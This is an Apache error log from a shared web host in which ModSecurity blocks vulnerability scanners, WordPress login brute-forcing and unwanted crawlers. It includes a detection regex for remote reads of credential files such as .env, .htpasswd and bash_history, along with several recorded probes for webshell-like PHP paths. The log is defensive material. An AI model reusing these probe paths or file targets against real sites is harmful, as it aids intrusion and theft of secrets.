[Tue May 26 12:57:26.602261 2026] [security2:error] [pid 461618:tid 461815] [client 20.206.67.134:7451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVLXlyiSlSCHr1fdr3IaQAAAMg"]
[Tue May 26 12:57:26.621174 2026] [security2:error] [pid 461618:tid 461793] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLXlyiSlSCHr1fdr3IXgAAALI"]
[Tue May 26 12:57:28.461873 2026] [security2:error] [pid 461618:tid 461854] [client 101.58.80.208:63711] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVLYFyiSlSCHr1fdr3IiAAAAO8"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 12:57:28.715883 2026] [security2:error] [pid 461618:tid 461799] [client 192.241.222.196:39836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/.env"] [unique_id "ahVLYFyiSlSCHr1fdr3IkwAAALg"]
[Tue May 26 12:57:28.885392 2026] [security2:error] [pid 461618:tid 461808] [client 114.119.135.96:32491] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/homepages/portfolio-minimal/"] [unique_id "ahVLYFyiSlSCHr1fdr3IlQAAAME"], referer: http://www.anujoverseas.in/homepages/portfolio-minimal/
[Tue May 26 12:57:29.416962 2026] [security2:error] [pid 461618:tid 461719] [remote 103.27.200.76:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.200.27.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVLYVyiSlSCHr1fdr3ImgAAoGQ"]
[Tue May 26 12:57:31.394215 2026] [security2:error] [pid 461618:tid 461825] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLYlyiSlSCHr1fdr3IsgAAANI"]
[Tue May 26 12:57:31.431509 2026] [security2:error] [pid 461618:tid 461844] [client 34.90.191.83:32768] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "consultrgb.moes-art.com"] [uri "/"] [unique_id "ahVLY1yiSlSCHr1fdr3ItwAAAOU"]
[Tue May 26 12:57:31.431607 2026] [security2:error] [pid 461618:tid 461844] [client 34.90.191.83:32768] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "consultrgb.moes-art.com"] [uri "/"] [unique_id "ahVLY1yiSlSCHr1fdr3ItwAAAOU"]
[Tue May 26 12:57:31.848138 2026] [security2:error] [pid 461618:tid 461779] [client 20.206.67.134:7462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-plain.php"] [unique_id "ahVLY1yiSlSCHr1fdr3IxQAAAKQ"], referer: www.google.com
[Tue May 26 12:57:31.848494 2026] [security2:error] [pid 461618:tid 461784] [client 20.206.67.134:5226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVLY1yiSlSCHr1fdr3IxgAAAKk"], referer: www.google.com
[Tue May 26 12:57:32.244445 2026] [security2:error] [pid 461618:tid 461810] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLY1yiSlSCHr1fdr3IxAAAAMM"]
[Tue May 26 12:57:32.996687 2026] [http2:info] [pid 470766:tid 470766] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 12:57:33.048139 2026] [security2:error] [pid 470766:tid 470899] [client 20.206.67.134:3917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVLZejO_W1DqEcFHQ7UXgAAAAM"]
[Tue May 26 12:57:33.422149 2026] [security2:error] [pid 470766:tid 470767] [remote 121.200.216.55:35860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVLZejO_W1DqEcFHQ7UZQAABAA"]
[Tue May 26 12:57:33.749749 2026] [security2:error] [pid 470766:tid 470898] [client 157.20.138.61:50207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLZejO_W1DqEcFHQ7UawAAAAI"]
[Tue May 26 12:57:33.749950 2026] [security2:error] [pid 470766:tid 470898] [client 157.20.138.61:50207] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLZejO_W1DqEcFHQ7UawAAAAI"]
[Tue May 26 12:57:34.959885 2026] [security2:error] [pid 470766:tid 470949] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLZujO_W1DqEcFHQ7UfAAAADU"]
[Tue May 26 12:57:35.390519 2026] [security2:error] [pid 470766:tid 470957] [client 20.206.67.134:5192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/asgukvix.php"] [unique_id "ahVLZ-jO_W1DqEcFHQ7UiwAAAD0"], referer: www.google.com
[Tue May 26 12:57:35.566915 2026] [security2:error] [pid 470766:tid 470925] [client 45.148.10.120:50146] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVLZujO_W1DqEcFHQ7UcgAAAB0"]
[Tue May 26 12:57:35.868311 2026] [security2:error] [pid 470766:tid 470991] [client 20.206.67.134:4044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVLZ-jO_W1DqEcFHQ7UnAAAAF8"]
[Tue May 26 12:57:35.996779 2026] [security2:error] [pid 470766:tid 470860] [remote 37.187.156.42:47134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVLZ-jO_W1DqEcFHQ7UmwAAVV0"]
[Tue May 26 12:57:36.423216 2026] [security2:error] [pid 470766:tid 471010] [client 74.7.230.11:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "support.mosykay.com"] [uri "/index.php"] [unique_id "ahVLaOjO_W1DqEcFHQ7UowAAAHI"]
[Tue May 26 12:57:36.423851 2026] [security2:error] [pid 470766:tid 471008] [client 74.7.230.11:40742] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "support.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVLaOjO_W1DqEcFHQ7UoQAAcEw"]
[Tue May 26 12:57:37.442690 2026] [security2:error] [pid 470766:tid 470926] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLaejO_W1DqEcFHQ7UvAAAAB4"]
[Tue May 26 12:57:40.275693 2026] [security2:error] [pid 470766:tid 470939] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLa-jO_W1DqEcFHQ7VAwAAACs"]
[Tue May 26 12:57:43.034064 2026] [security2:error] [pid 470766:tid 470949] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLbujO_W1DqEcFHQ7VOAAAADU"]
[Tue May 26 12:57:44.209606 2026] [security2:error] [pid 470766:tid 470978] [client 157.20.138.61:50568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLcOjO_W1DqEcFHQ7VXAAAAFI"]
[Tue May 26 12:57:44.209750 2026] [security2:error] [pid 470766:tid 470978] [client 157.20.138.61:50568] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLcOjO_W1DqEcFHQ7VXAAAAFI"]
[Tue May 26 12:57:45.722872 2026] [security2:error] [pid 470766:tid 470923] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLcejO_W1DqEcFHQ7VdQAAABs"]
[Tue May 26 12:57:47.314385 2026] [security2:error] [pid 470766:tid 470920] [client 66.249.64.42:59593] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLcujO_W1DqEcFHQ7ViQAAABg"], referer: https://mosykay.com/products/4261784/
[Tue May 26 12:57:48.371251 2026] [security2:error] [pid 470766:tid 470967] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLc-jO_W1DqEcFHQ7VsQAAAEc"]
[Tue May 26 12:57:48.774105 2026] [security2:error] [pid 470766:tid 470999] [client 104.28.122.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVLdOjO_W1DqEcFHQ7VwgAAAGc"]
[Tue May 26 12:57:48.995221 2026] [core:error] [pid 470766:tid 470809] (13)Permission denied: [remote 74.7.227.172:34542] AH00132: file permissions deny server access: /home2/wrapmjh1/wpdev.wrapmachines.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-brands-400.woff2, referer: https://wpdev.wrapmachines.com/
[Tue May 26 12:57:49.494137 2026] [core:error] [pid 470766:tid 470812] (13)Permission denied: [remote 74.7.227.172:34542] AH00132: file permissions deny server access: /home2/wrapmjh1/wpdev.wrapmachines.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-regular-400.woff2, referer: https://wpdev.wrapmachines.com/
[Tue May 26 12:57:50.007847 2026] [core:error] [pid 470766:tid 470815] (13)Permission denied: [remote 74.7.227.172:34542] AH00132: file permissions deny server access: /home2/wrapmjh1/wpdev.wrapmachines.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2, referer: https://wpdev.wrapmachines.com/
[Tue May 26 12:57:50.330112 2026] [security2:error] [pid 470766:tid 470997] [client 14.189.32.155:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLdejO_W1DqEcFHQ7V2wAAAGU"]
[Tue May 26 12:57:51.404941 2026] [security2:error] [pid 470766:tid 470953] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLdujO_W1DqEcFHQ7V8gAAADk"]
[Tue May 26 12:57:53.227611 2026] [security2:error] [pid 470766:tid 470971] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLeOjO_W1DqEcFHQ7WEwAAAEs"]
[Tue May 26 12:57:54.679644 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:50932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLeujO_W1DqEcFHQ7WMwAAAHI"]
[Tue May 26 12:57:54.679762 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:50932] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLeujO_W1DqEcFHQ7WMwAAAHI"]
[Tue May 26 12:57:54.726850 2026] [security2:error] [pid 470766:tid 471013] [client 172.225.181.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVLeujO_W1DqEcFHQ7WLwAAAHU"]
[Tue May 26 12:57:56.115069 2026] [security2:error] [pid 470766:tid 470934] [client 185.191.171.15:53746] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVLfOjO_W1DqEcFHQ7WSwAAACY"]
[Tue May 26 12:57:56.115229 2026] [security2:error] [pid 470766:tid 470934] [client 185.191.171.15:53746] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVLfOjO_W1DqEcFHQ7WSwAAACY"]
[Tue May 26 12:57:56.378204 2026] [security2:error] [pid 470766:tid 470993] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLe-jO_W1DqEcFHQ7WSQAAAGE"]
[Tue May 26 12:57:56.869123 2026] [core:crit] [pid 470766:tid 470948] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:57:58.591437 2026] [security2:error] [pid 470766:tid 470953] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLfujO_W1DqEcFHQ7WdAAAADk"]
[Tue May 26 12:58:01.244939 2026] [security2:error] [pid 470766:tid 470898] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLgOjO_W1DqEcFHQ7WjgAAAAI"]
[Tue May 26 12:58:04.040373 2026] [security2:error] [pid 470766:tid 470991] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLg-jO_W1DqEcFHQ7WugAAAF8"]
[Tue May 26 12:58:05.370430 2026] [security2:error] [pid 470766:tid 470899] [client 157.20.138.61:51292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLhejO_W1DqEcFHQ7W0gAAAAM"]
[Tue May 26 12:58:05.370596 2026] [security2:error] [pid 470766:tid 470899] [client 157.20.138.61:51292] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLhejO_W1DqEcFHQ7W0gAAAAM"]
[Tue May 26 12:58:06.028240 2026] [security2:error] [pid 470766:tid 470908] [client 62.60.130.231:60215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-login.php"] [unique_id "ahVLhejO_W1DqEcFHQ7W2AAAAAw"], referer: https://www.facebook.com/
[Tue May 26 12:58:06.369037 2026] [security2:error] [pid 470766:tid 470920] [client 62.60.130.231:58637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-login.php"] [unique_id "ahVLhujO_W1DqEcFHQ7W5gAAABg"], referer: https://wordpress.org/
[Tue May 26 12:58:06.793052 2026] [security2:error] [pid 470766:tid 471020] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLhujO_W1DqEcFHQ7W5QAAAHw"]
[Tue May 26 12:58:07.143156 2026] [security2:error] [pid 470766:tid 470926] [client 4.201.75.230:41927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.shankhanaad.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVLh-jO_W1DqEcFHQ7W8AAAAB4"]
[Tue May 26 12:58:07.192610 2026] [security2:error] [pid 470766:tid 471009] [client 62.60.130.231:60215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-login.php"] [unique_id "ahVLh-jO_W1DqEcFHQ7W8wAAAHE"]
[Tue May 26 12:58:08.048503 2026] [security2:error] [pid 470766:tid 470900] [client 74.7.228.15:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.houstontxmobilecovidlab.taotechservices.com"] [uri "/index.php"] [unique_id "ahVLh-jO_W1DqEcFHQ7W-QAAAAQ"]
[Tue May 26 12:58:08.049515 2026] [security2:error] [pid 470766:tid 470974] [client 74.7.228.15:36646] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.houstontxmobilecovidlab.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVLh-jO_W1DqEcFHQ7W9wAATno"]
[Tue May 26 12:58:11.341976 2026] [security2:error] [pid 470766:tid 470979] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVLi-jO_W1DqEcFHQ7XQAAAAFM"], referer: https://www.ucdc.co.in/
[Tue May 26 12:58:12.756826 2026] [security2:error] [pid 470766:tid 470901] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLjOjO_W1DqEcFHQ7XWQAAAAU"]
[Tue May 26 12:58:14.985832 2026] [security2:error] [pid 470766:tid 471017] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLjujO_W1DqEcFHQ7XiQAAAHk"]
[Tue May 26 12:58:15.780330 2026] [security2:error] [pid 470766:tid 470900] [client 157.20.138.61:51649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLj-jO_W1DqEcFHQ7XnwAAAAQ"]
[Tue May 26 12:58:15.780503 2026] [security2:error] [pid 470766:tid 470900] [client 157.20.138.61:51649] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLj-jO_W1DqEcFHQ7XnwAAAAQ"]
[Tue May 26 12:58:16.106679 2026] [security2:error] [pid 470766:tid 470912] [client 4.201.75.230:41930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.shankhanaad.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVLkOjO_W1DqEcFHQ7XpgAAABA"]
[Tue May 26 12:58:16.123324 2026] [security2:error] [pid 470766:tid 470970] [client 14.164.155.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLj-jO_W1DqEcFHQ7XngAAAEo"]
